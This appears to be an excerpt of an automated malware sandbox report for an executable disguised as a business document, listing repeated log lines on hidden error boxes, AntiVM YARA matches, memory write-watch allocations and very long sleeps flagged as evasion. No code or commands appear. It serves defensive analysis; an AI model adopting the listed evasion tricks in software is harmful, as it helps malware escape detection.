Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 7032, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: AC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 2470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 4470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 7290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 6880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 8290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 9290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 10A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: 2C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 3060000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 3250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 5250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 7AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 8AA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 8C30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 9C30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 3160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory allocated: 3160000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599870 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598734 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598188 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597843 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597733 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597514 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597385 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597280 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597172 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597063 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594494 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594141 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594031 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 593922 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599445
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599216
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598900
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596084
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595811
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595692
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595223
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 593885
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4815 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6041 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Window / User API: threadDelayed 2673 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Window / User API: threadDelayed 7158 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Window / User API: threadDelayed 2942
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Window / User API: threadDelayed 6907
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7988 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5952 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -28592453314249787s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420 Thread sleep count: 2673 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599870s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599764s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420 Thread sleep count: 7158 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -599078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -598063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597733s >= -30000s Jump to behavior
